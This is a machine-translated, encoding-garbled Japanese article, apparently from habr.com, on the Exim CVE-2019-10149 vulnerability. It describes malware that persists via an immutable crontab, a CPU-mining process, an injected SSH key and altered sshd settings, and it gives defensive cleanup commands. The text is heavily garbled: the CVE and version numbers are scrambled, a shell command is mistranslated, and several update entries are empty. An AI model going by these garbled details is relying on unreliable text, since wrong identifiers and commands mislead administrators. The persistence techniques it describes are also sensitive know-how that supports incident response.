ã¡ãŒã« ãµãŒããŒã§ Exim ããŒãžã§ã³ 4.87 ïœ 4.91 ã䜿çšããŠããååã¯ãCVE-4.92-2019 ã«ãããããã³ã°ãé¿ããããã«ä»¥åã« Exim èªäœãåæ¢ããŠããã®ã§ãç·æ¥ã«ããŒãžã§ã³ 10149 ã«æŽæ°ããŠãã ããã
äžçäžã®æ°çŸäžå°ã®ãµãŒããŒãæœåšçã«è匱ã§ããããã®è匱æ§ã¯é倧ãšè©äŸ¡ãããŠããŸã (CVSS 3.0 åºæ¬ã¹ã³ã¢ = 9.8/10)ã æ»æè
ã¯ãå€ãã®å Žå root ãããµãŒããŒäžã§ä»»æã®ã³ãã³ããå®è¡ã§ããŸãã
ä¿®æ£ããŒãžã§ã³ (4.92) ãŸãã¯ãã§ã«ããããé©çšãããŠããããŒãžã§ã³ã䜿çšããŠããããšã確èªããŠãã ããã
ãŸãã¯æ¢åã®ãã®ã«ããããé©çšããŸããã¹ã¬ãããåç
§ããŠãã ãã
ã®ã¢ããããŒã CentOSã®6ïŒ cmã
UPD: Ubuntu ã圱é¿ãåããŸã 18.04ãš18.10ããããåãã®ã¢ããããŒãããªãªãŒã¹ãããŸããã ããŒãžã§ã³ 16.04 ããã³ 19.04 ã¯ãã«ã¹ã¿ã ãªãã·ã§ã³ãã€ã³ã¹ããŒã«ãããŠããªãéã圱é¿ãåããŸããã ããã«è©³ãã
ããã§èª¬æãããŠããåé¡ã (ãããããããã«ãã£ãŠ) ç©æ¥µçã«æªçšãããŠãããäžéšã®ãµãŒã㌠(4.91 ã§å®è¡ãããŠãã) ãææããŠããããšã«æ°ä»ããŸããã
ããã«èªãå¿ èŠãããã®ã¯ããã§ã«ãç解ããã人ã ãã§ãããã¹ãŠãæ°ãããœãããŠã§ã¢ãåããã¯ãªãŒã³ãª VPS ã«ç§»ããã解決çãæ¢ãå¿ èŠããããŸãã è©ŠããŠã¿ãŸããïŒ èª°ãããã®ãã«ãŠã§ã¢ãå æã§ãããã©ããæžããŠãã ããã
Exim ãŠãŒã¶ãŒã§ãããèªãã§ããããªãããŸã ã¢ããããŒãããŠããªãå Žå (4.92 ãŸãã¯ãããé©çšããŒãžã§ã³ãå©çšå¯èœã§ããããšã確èªããŠããªãå Žå)ãåæ¢ããŠå®è¡ããŠã¢ããããŒãããŠãã ããã
ãã§ã«ããã«å°éããŠãã人ã®ããã«ãç¶ããŠã¿ãŸããã...
UPDïŒ
å€çš®å€æ§ãªãã«ãŠã§ã¢ãååšããå¯èœæ§ããããŸãã ééã£ãç®çã§è¬ãçºå£²ããŠåã空ããŠãããŠãŒã¶ãŒã¯æ²»çãããäœã®æ²»çãå¿ èŠãªã®ããåãããªãå¯èœæ§ããããŸãã
ææã¯æ¬¡ã®ããã«é¡èã§ãã [kthrotlds] ã¯ããã»ããµãããŒãããŸãã 匱ã VDS ã§ã¯ 100% ã§ããããµãŒããŒã§ã¯åŒ±ãã§ããé¡èã§ãã
ææåŸããã«ãŠã§ã¢ã¯ cron ãšã³ããªãåé€ããããã«èªèº«ã ããç»é²ã㊠4 åããšã«å®è¡ãããcrontab ãã¡ã€ã«ãäžå€ã«ããŸãã Crontab -e å€æŽãä¿åã§ããããšã©ãŒãçºçããŸãã
Immutable ã¯ãããšãã°æ¬¡ã®ããã«åé€ããŠãããã³ãã³ã ã©ã€ã³ (1.5kb) ãåé€ã§ããŸãã
chattr -i /var/spool/cron/root
crontab -e
次ã«ãcrontab ãšãã£ã¿ãŒ (vim) ã§ã次ã®è¡ãåé€ããŠä¿åããŸããdd
:wq
ãã ããã¢ã¯ãã£ããªããã»ã¹ã®äžéšãåã³äžæžããããŠãããããã解æäžã§ãã
åæã«ãã€ã³ã¹ããŒã©ãŒ ã¹ã¯ãªãã (以äžãåç §) ããã®ã¢ãã¬ã¹ã«ã¶ãäžãã£ãŠããã¢ã¯ãã£ã㪠wget (ãŸãã¯ã«ãŒã«) ã®æããããä»ã®ãšãããã®ããã«ããããããã¯ããŠã³ããŠããŸãããåã³éå§ãããŸãã
ps aux | grep wge[t]
ps aux | grep cur[l]
echo "Stopping..."
kill -9 `ps aux | grep wge[t] | awk '{print $2}'`
kill -9 `ps aux | grep cur[l] | awk '{print $2}'`
ããã€ã®æšéŠ¬ã®ã€ã³ã¹ããŒã©ãŒ ã¹ã¯ãªããã¯ãã (centos) ã§èŠã€ãããŸãã: /usr/local/bin/nptd... åé¿ããããã«æçš¿ããŠããããã§ã¯ãããŸããããææããŠãã人ã§ã·ã§ã« ã¹ã¯ãªãããç解ããŠãã人ãããå Žåã¯ããã£ãšæ³šææ·±ã調ã¹ãŠãã ããã
æ å ±ãæŽæ°ãã次第远èšãããŠããã ããŸãã
UPD 1: ãã¡ã€ã«ãåé€ãã (äºåç㪠chattr -i ã䜿çš) /etc/cron.d/rootã/etc/crontabãrm -Rf /var/spool/cron/root ã¯åœ¹ã«ç«ã¡ãŸããã§ããããŸãããµãŒãã¹ãåæ¢ããããšãã§ããŸããã§ããããšãããã crontab ãå®å šã«ç Žæ£ããŸã (bin ãã¡ã€ã«ã®ååãå€æŽããŸã)ã
UPD 2: ããã€ã®æšéŠ¬ã€ã³ã¹ããŒã©ãŒã¯ä»ã®å Žæã«ãååšããããšãããããµã€ãºã«ããæ€çŽ¢ã圹ã«ç«ã¡ãŸããã
æ€çŽ¢ / -ãµã€ãº 19825c
UPD 3ïŒ èŠåïŒ ãã®ããã€ã®æšéŠ¬ã¯ãselinux ãç¡å¹ã«ããã ãã§ãªããç¬èªã® SSHã㌠${sshdir}/authorized_keys ã«ãããŸã! ãŸãã/etc/ssh/sshd_config å
ã®æ¬¡ã®ãã£ãŒã«ãããŸã YES ã«èšå®ãããŠããªãå Žåã¯ããããã®ãã£ãŒã«ããã¢ã¯ãã£ãã«ããŸãã
PermitRootLoginã¯ã
RSAèªèšŒã¯ã
PubkeyAuthenticationã¯ã
ãšã³ãŒ PAM ã®äœ¿çš ã¯ã
PasswordAuthentication ã¯ã
UPD 4: çŸæç¹ã§ã®èŠçŽ: Eximãcron (ã«ãŒãä»ã) ãç¡å¹ã«ããssh ããããã€ã®æšéŠ¬ããŒãç·æ¥ã«åé€ããsshd èšå®ãç·šéããsshd ãåèµ·åããŸãã ããã圹ç«ã€ãã©ããã¯ãŸã æããã§ã¯ãããŸããããããããªããã°åé¡ãçºçããŸãã
èªè ãããããå§ããããããã«ãããã/ã¢ããããŒãã«é¢ããã³ã¡ã³ãããéèŠãªæ å ±ãã¡ã¢ã®å é ã«ç§»åããŸããã
UPD 5ïŒ
UPD 6ïŒ
å®å®ãã解決çãäœã£ã (ãŸãã¯èŠã€ãã) 人ã¯ããã²æžããŠãã ãããããªãã¯å€ãã®äººãå©ããã§ãããã
UPD 7ïŒ
Exim ã§æªéä¿¡ã®ã¬ã¿ãŒã®ãããã§ãŠã€ã«ã¹ã埩掻ãããšãŸã èšã£ãŠããªãå Žåã¯ãã¬ã¿ãŒãå床éä¿¡ããããšãããšåŸ©å ãããŸãã/var/spool/exim4 ã調ã¹ãŠãã ããã
次ã®ããã«ã㊠Exim ãã¥ãŒå
šäœãã¯ãªã¢ã§ããŸãã
exipick -i | xargs exim -Mrm
ãã¥ãŒå
ã®ãšã³ããªæ°ã確èªããŸãã
exim-bpc
UPD 8: åã³
UPD9ïŒæ¬¡ã®ããã§ã äœåãããããšãããããŸãã
éèŠãªããšã¯ããµãŒããŒããã§ã«äŸµå®³ãããŠãããæ»æè ãããã«éå žåçãªåä»ãªãã® (ãããããŒã«ã¯ãªã¹ããããŠããªã) ãä»æããããšãã§ããå¯èœæ§ãããããšãå¿ããªãã§ãã ããã
ãããã£ãŠãå®å šã«ã€ã³ã¹ããŒã«ããããµãŒã㌠(vds) ã«ç§»åããããå°ãªããšããããã¯ã®ç£èŠãç¶ç¶ããããšããå§ãããŸããäœãæ°ããããšãããã°ãããã«ã³ã¡ã³ããæžã蟌ãã§ãã ããã æããã«ã誰ããæ°èŠã€ã³ã¹ããŒã«ã«ç§»è¡ããããã§ã¯ãããŸãã...
UPD 10: æ¹ããŠæè¬ããŸã
UPD 11: ãã
(ãã®ãã«ãŠã§ã¢ãšæŠãäœããã®æ¹æ³ã䜿çšããåŸ)
å¿ ãåèµ·åããå¿ èŠããããŸãããã«ãŠã§ã¢ã¯éããŠããããã»ã¹ã®ã©ããããããã£ãŠã¡ã¢ãªå ã«åžžé§ãã30 ç§ããšã« cron ã«æ°ãããã«ãŠã§ã¢ãæžã蟌ã¿ãŸãã
UPD 12ïŒ
UPD 13ïŒ
UPD 14: è³¢ã人㯠root ããéãããããªãã®ã§å®å¿ããŠãã ãã - ãã XNUMX ã€
ã«ãŒãããã¯æ©èœããªãå Žåã§ãããããã³ã°ãçºçããŸã...ç§ã¯ Debian jessie UPD ãæã£ãŠããŸã: OrangePi ã§ã¹ãã¬ããããExim 㯠Debian-exim ããå®è¡ãããŠããŸãããäŸç¶ãšããŠãããã³ã°ãçºçããã¯ã©ãŠã³ã倱ããããªã©ã§ãã
UPD 15: 䟵害ããããµãŒããŒããã¯ãªãŒã³ãªãµãŒããŒã«ç§»è¡ãããšãã¯ãè¡çç¶æ
ãå¿ããªãã§ãã ããã
ããŒã¿ã転éãããšãã¯ãå®è¡å¯èœãã¡ã€ã«ãèšå®ãã¡ã€ã«ã ãã§ãªããæªæã®ããã³ãã³ããå«ãŸããŠããå¯èœæ§ã®ãããã®ã«ã泚æããŠãã ãã (ããšãã°ãMySQL ã§ã¯ãCREATE TRIGGER ã CREATE EVENT ãªã©)ã ãŸãã.htmlã.jsã.phpã.py ããã³ãã®ä»ã®ãããªã㯠ãã¡ã€ã«ã«ã€ããŠãå¿ããªãã§ãã ãã (çæ³çã«ã¯ããããã®ãã¡ã€ã«ã¯ãä»ã®ããŒã¿ãšåæ§ã«ãããŒã«ã«ãŸãã¯ä»ã®ä¿¡é Œã§ããã¹ãã¬ãŒãžãã埩å ããå¿ èŠããããŸã)ã
UPD 16ïŒ
ããã§ã¿ã㪠ã¢ããããŒãåŸã«ç¢ºèªããå¿ èŠããããŸã æ°ããããŒãžã§ã³ã䜿çšããŠããããšã確èªããŠãã ããã
exim --version
ç§ãã¡ã¯åœŒãã®å ·äœçãªç¶æ³ãäžç·ã«æŽçããŸããã
ãµãŒããŒã¯ DirectAdmin ãšãã®å€ã da_exim ããã±ãŒãž (è匱æ§ã®ãªãå€ãããŒãžã§ã³) ã䜿çšããŠããŸããã
åæã«ãDirectAdmin ã®custombuild ããã±ãŒãž ãããŒãžã£ãŒã®å©ããåããŠãå®éã«ã¯ããã§ã«è匱㪠Exim ã®æ°ããããŒãžã§ã³ãã€ã³ã¹ããŒã«ãããŸããã
ãã®ç¹å®ã®ç¶æ³ã§ã¯ãcustombuild ã«ããæŽæ°ã圹ã«ç«ã¡ãŸããã
ãã®ãããªå®éšã®åã«ããã¯ã¢ãããäœæããããšãå¿ããªãã§ãã ããããŸããæŽæ°ã®ååŸã«ãã¹ãŠã® Exim ããã»ã¹ãå€ãããŒãžã§ã³ã§ããããšã確èªããŠãã ããã
åºæïŒ habr.com